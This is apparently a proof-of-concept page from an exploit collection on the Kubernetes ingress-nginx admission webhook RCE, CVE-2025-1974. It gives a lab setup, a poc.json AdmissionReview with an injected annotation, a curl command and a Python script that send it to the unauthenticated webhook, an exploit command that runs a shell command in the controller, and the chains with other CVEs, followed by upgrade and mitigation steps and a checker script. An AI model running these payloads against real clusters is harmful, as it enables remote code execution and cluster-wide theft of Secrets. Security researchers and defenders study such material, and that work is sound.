Awesome-POC/云安全漏洞/Kubernetes Ingress-nginx admission 远程代码执行漏洞 CVE-2025-1974.md
2025-04-14 17:53:04 +08:00


# Kubernetes Ingress-nginx admission remote code execution vulnerability CVE-2025-1974
## Vulnerability description
Ingress-nginx is the entry point through which services inside a Kubernetes cluster are exposed externally, and it carries the traffic to those services. In releases before 1.11.5 and in release 1.12.0, the Kubernetes Ingress-nginx admission controller has a configuration-injection vulnerability. A remote attacker with network access to the cluster (the pod network is enough) can submit an Ingress object directly to the `ValidatingAdmissionWebhook` for validation; the webhook does not authenticate the caller, renders the object into an nginx configuration, and tests that configuration with nginx, so directives injected through the object reach nginx and are acted on. The result is remote code execution in the Ingress-nginx container, and because the controller can read Secrets cluster-wide, those Secrets can be exposed as well.
References:
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-1974
- https://github.com/sandumjacob/IngressNightmare-POCs
- https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
- CVE-2025-24513: [kubernetes/kubernetes#131005](https://github.com/kubernetes/kubernetes/issues/131005)
- CVE-2025-24514: [kubernetes/kubernetes#131006](https://github.com/kubernetes/kubernetes/issues/131006)
- CVE-2025-1097: [kubernetes/kubernetes#131007](https://github.com/kubernetes/kubernetes/issues/131007)
- CVE-2025-1098: [kubernetes/kubernetes#131008](https://github.com/kubernetes/kubernetes/issues/131008)
- CVE-2025-1974: [kubernetes/kubernetes#131009](https://github.com/kubernetes/kubernetes/issues/131009)
## Affected versions
```
Ingress-nginx < v1.11.0
Ingress-nginx v1.11.0 - 1.11.4
Ingress-nginx v1.12.0
```
## Environment setup
Install minikube and kubectl:
- [minikube](https://minikube.sigs.k8s.io/docs/start/)
- [kubectl](https://kubernetes.io/docs/reference/kubectl/)
Start minikube. The minikube, kubectl and Kubernetes server versions used in this environment are:
```
minikube version
-----
minikube version: v1.33.1
commit: 5883c09216182566a63dff4c326a6fc9ed2982ff
```
```
kubectl version
-----
Client Version: v1.30.1
Kustomize Version: v5.0.4-0.20230601165947-6ce0bf390ce3
Server Version: v1.30.0
```
Download the [deploy.yaml](https://github.com/kubernetes/ingress-nginx/blob/f6456ea86c6c330e7cf401ade70ce1faa757265b/deploy/static/provider/cloud/deploy.yaml) for Kubernetes Ingress-nginx 1.11.3 and deploy the resources with kubectl:
```
kubectl apply -f deploy.yaml
```
Once the deployment finishes, list the pods in the ingress-nginx namespace:
```
kubectl get pods -n ingress-nginx
-----
NAME READY STATUS RESTARTS AGE
ingress-nginx-admission-create-jmw9x 0/1 Completed 0 24m
ingress-nginx-admission-patch-jbxj6 0/1 Completed 1 24m
ingress-nginx-controller-869748796c-p4jvj 1/1 Running 0 24m
```
![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250413172307109.png)
## Reproduction
Inspect the controller pod; its arguments show the webhook server listening on port 8443:
```
kubectl describe pod ingress-nginx-controller-869748796c-p4jvj -n ingress-nginx
-----
--validating-webhook=:8443
```
![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250413172648584.png)
Use port forwarding to reach the webhook port:
```
kubectl port-forward -n ingress-nginx ingress-nginx-controller-869748796c-p4jvj 1337:8443
```
![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250413172813574.png)
The vulnerable webhook server in the pod is now forwarded to local port 1337. Run the [poc](https://github.com/sandumjacob/IngressNightmare-POCs), which posts an AdmissionReview whose Ingress object carries nginx configuration through its annotations:
```
curl --insecure -v -H "Content-Type: application/json" --data @poc.json https://localhost:1337/fake/path
```
![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250413173013506.png)
Check the controller logs to confirm the request was processed:
```
kubectl logs ingress-nginx-controller-869748796c-p4jvj -n ingress-nginx
```
![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250413173205563.png)
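As an added example (not part of the original page or of the IngressNightmare-POCs repository), the following Python script builds the same kind of AdmissionReview that the curl command above posts, sends it to the port-forwarded webhook, and reads back the AdmissionResponse. When ingress-nginx denies the review, the error from its nginx configuration test is returned in `response.status.message`, so the reply itself shows whether an injected annotation reached nginx, without tailing the controller logs. The script assumes the page's port-forward to `localhost:1337`, uses the webhook's configured path `/networking/v1/ingresses` (the page's curl shows any path is accepted), and puts the `ingresses` resource in the request instead of the `namespaces` placeholder in poc.json; the host name and request uid are constructed placeholders.

```python
import json
import ssl
import sys
import urllib.request

# Assumed: the page's `kubectl port-forward ... 1337:8443` is running.
WEBHOOK_URL = "https://localhost:1337/networking/v1/ingresses"


def build_admission_review(annotations, name="deads"):
    """Wrap an Ingress carrying `annotations` in an AdmissionReview, following the
    layout of the page's poc.json. The annotations are the input that ingress-nginx's
    annotation parsers turn into nginx directives, so this is where injected
    configuration goes."""
    ingress = {
        "metadata": {"name": name, "annotations": dict(annotations)},
        "spec": {
            "ingressClassName": "nginx",
            "rules": [{
                "host": "example.test",  # constructed placeholder host
                "http": {"paths": [{
                    "path": "/",
                    "pathType": "Prefix",
                    "backend": {"service": {"name": "kubernetes", "port": {"number": 80}}},
                }]},
            }],
        },
    }
    return {
        "apiVersion": "admission.k8s.io/v1",
        "kind": "AdmissionReview",
        "request": {
            "uid": "11111111-2222-3333-4444-555555555555",  # constructed placeholder uid
            "kind": {"group": "networking.k8s.io", "version": "v1", "kind": "Ingress"},
            "resource": {"group": "networking.k8s.io", "version": "v1", "resource": "ingresses"},
            "operation": "CREATE",
            "object": ingress,
        },
    }


def parse_admission_response(body):
    """Return (allowed, message) from an AdmissionReview reply. A denied review
    carries the reason in response.status.message; for ingress-nginx that is the
    output of its nginx config test, so injected directives show up there verbatim."""
    review = json.loads(body)
    resp = review.get("response") or {}
    allowed = bool(resp.get("allowed", False))
    message = (resp.get("status") or {}).get("message", "")
    return allowed, message


def send_review(review, url=WEBHOOK_URL):
    """POST the review to the webhook. The webhook serves a self-signed certificate
    and does not authenticate the caller, hence the unverified TLS context."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(
        url,
        data=json.dumps(review).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, context=ctx, timeout=15) as resp:
        return parse_admission_response(resp.read())


if __name__ == "__main__":
    # Usage: python admission_probe.py [annotation-value]
    # The default reproduces the mirror-host annotation from the page's poc.json.
    value = sys.argv[1] if len(sys.argv) > 1 else "test"
    review = build_admission_review({"nginx.ingress.kubernetes.io/mirror-host": value})
    allowed, message = send_review(review)
    print("allowed:", allowed)
    print(message or "(no message)")
```

A patched controller still answers these requests when they arrive through the API server, so an `allowed: false` reply by itself proves only that the endpoint is reachable; what matters is that the request was accepted from an unauthenticated client and that the message contains nginx's own test output.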
CVE-2025-1974 can be chained with the other vulnerabilities:
- CVE-2025-1974 + CVE-2025-24514 → auth-url injection → RCE
- CVE-2025-1974 + CVE-2025-1097 → auth-tls-match-cn injection → RCE
- CVE-2025-1974 + CVE-2025-1098 → mirror UID injection → RCE
For local testing, forward both the controller's HTTP port and the admission service to `localhost`, since the exploit uses both endpoints (the `-u` and `-i` arguments below):
```
kubectl port-forward svc/ingress-nginx-controller -n ingress-nginx 8080:80
kubectl port-forward -n ingress-nginx svc/ingress-nginx-controller-admission 8443:443
```
Run the command `touch /tmp/awesome_poc` inside the controller container through the exploit:
```
./exp -m c -c 'touch /tmp/awesome_poc' -i https://localhost:8443/networking/v1/ingresses -u http://localhost:8080/fake/addr
```
![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250414173754627.png)
![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250414173824804.png)
## POC
poc.json:
```json
{
  "apiVersion": "admission.k8s.io/v1",
  "kind": "AdmissionReview",
  "request": {
    "kind": {
      "group": "networking.k8s.io",
      "version": "v1",
      "kind": "Ingress"
    },
    "resource": {
      "group": "",
      "version": "v1",
      "resource": "namespaces"
    },
    "operation": "CREATE",
    "object": {
      "metadata": {
        "name": "deads",
        "annotations": {
          "nginx.ingress.kubernetes.io/mirror-host": "test"
        }
      },
      "spec": {
        "rules": [
          {
            "host": "jacobsandum.com",
            "http": {
              "paths": [
                {
                  "path": "/",
                  "pathType": "Prefix",
                  "backend": {
                    "service": {
                      "name": "kubernetes",
                      "port": {
                        "number": 80
                      }
                    }
                  }
                }
              ]
            }
          }
        ],
        "ingressClassName": "nginx"
      }
    }
  }
}
```
## Fix
- Upgrade to 1.11.5, 1.12.1, or a later release.
- Make sure the admission webhook endpoint is not reachable from outside the cluster, and that inside the cluster only the Kubernetes API server can connect to it.
Mitigations:
- Reinstall ingress-nginx with the Helm value `controller.admissionWebhooks.enabled=false`.
- Delete the `ValidatingWebhookConfiguration` named `ingress-nginx-admission`, and remove the `--validating-webhook` argument from the `ingress-nginx-controller` container in its Deployment or DaemonSet.
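As an added example (not from the original page), the following Python check covers both the affected-version ranges listed above and the two mitigation steps: it reads the JSON that `kubectl get deployment ingress-nginx-controller -n ingress-nginx -o json` and `kubectl get validatingwebhookconfigurations -o json` produce, extracts the controller version from the image tag, decides whether it falls in the affected ranges, and reports whether `--validating-webhook` is still passed to the controller and whether the `ingress-nginx-admission` configuration still exists. The embedded inputs are constructed samples in the shape of that kubectl output; the image reference format (`registry.k8s.io/ingress-nginx/controller:v1.11.3@sha256:...`) and the container name `controller` are assumptions about the deployment.

```python
import json
import re
import sys

# Constructed sample in the shape of
# `kubectl get deployment ingress-nginx-controller -n ingress-nginx -o json`.
SAMPLE_DEPLOYMENT = {
    "kind": "Deployment",
    "metadata": {"name": "ingress-nginx-controller", "namespace": "ingress-nginx"},
    "spec": {"template": {"spec": {"containers": [{
        "name": "controller",
        "image": "registry.k8s.io/ingress-nginx/controller:v1.11.3@sha256:" + "0" * 64,
        "args": [
            "/nginx-ingress-controller",
            "--election-id=ingress-nginx-leader",
            "--controller-class=k8s.io/ingress-nginx",
            "--ingress-class=nginx",
            "--validating-webhook=:8443",
            "--validating-webhook-certificate=/usr/local/certificates/cert",
            "--validating-webhook-key=/usr/local/certificates/key",
        ],
    }]}}},
}

# Constructed sample in the shape of `kubectl get validatingwebhookconfigurations -o json`.
SAMPLE_WEBHOOKS = {
    "kind": "ValidatingWebhookConfigurationList",
    "items": [{"metadata": {"name": "ingress-nginx-admission"}}],
}


def parse_version(image):
    """Return (major, minor, patch) from the controller image tag, ignoring any
    @sha256 digest; None when the tag carries no version (e.g. :latest)."""
    m = re.search(r":v?(\d+)\.(\d+)\.(\d+)", image)
    return tuple(int(x) for x in m.groups()) if m else None


def is_affected_version(version):
    """Affected ranges from the section above: every release before v1.11.5, plus
    v1.12.0. An unknown version is treated as affected until proven otherwise."""
    if version is None:
        return True
    return version < (1, 11, 5) or version == (1, 12, 0)


def webhook_state(deployment, webhook_configs):
    """The two mitigation steps: is --validating-webhook still passed to the
    controller container, and does the ingress-nginx-admission
    ValidatingWebhookConfiguration still exist?"""
    containers = deployment["spec"]["template"]["spec"]["containers"]
    ctrl = next((c for c in containers if c.get("name") == "controller"), containers[0])
    flag_set = any(a == "--validating-webhook" or a.startswith("--validating-webhook=")
                   for a in ctrl.get("args", []))
    vwc_present = any(i["metadata"]["name"] == "ingress-nginx-admission"
                      for i in webhook_configs.get("items", []))
    return {"image": ctrl["image"], "flag_set": flag_set, "vwc_present": vwc_present}


def assess(deployment, webhook_configs):
    """Combine version and webhook state. The listener on 8443 exists whenever the
    flag is set, whether or not the API server is still configured to call it, so
    deleting the ValidatingWebhookConfiguration alone does not remove the exposure."""
    state = webhook_state(deployment, webhook_configs)
    state["version"] = parse_version(state["image"])
    state["affected_version"] = is_affected_version(state["version"])
    state["exploitable"] = state["affected_version"] and state["flag_set"]
    state["mitigation_complete"] = not state["flag_set"] and not state["vwc_present"]
    return state


if __name__ == "__main__":
    # Usage: python check_ingress_nginx.py deployment.json webhooks.json
    # Without arguments the constructed samples above are assessed.
    if len(sys.argv) == 3:
        with open(sys.argv[1]) as f:
            deployment = json.load(f)
        with open(sys.argv[2]) as f:
            webhooks = json.load(f)
    else:
        deployment, webhooks = SAMPLE_DEPLOYMENT, SAMPLE_WEBHOOKS
    print(json.dumps(assess(deployment, webhooks), indent=2))
```

For the sample input the report shows version 1.11.3, the flag set and the webhook configuration present, so `exploitable` is true and `mitigation_complete` is false; after either mitigation above is applied to a cluster, rerunning the check against fresh kubectl output should flip `flag_set` to false.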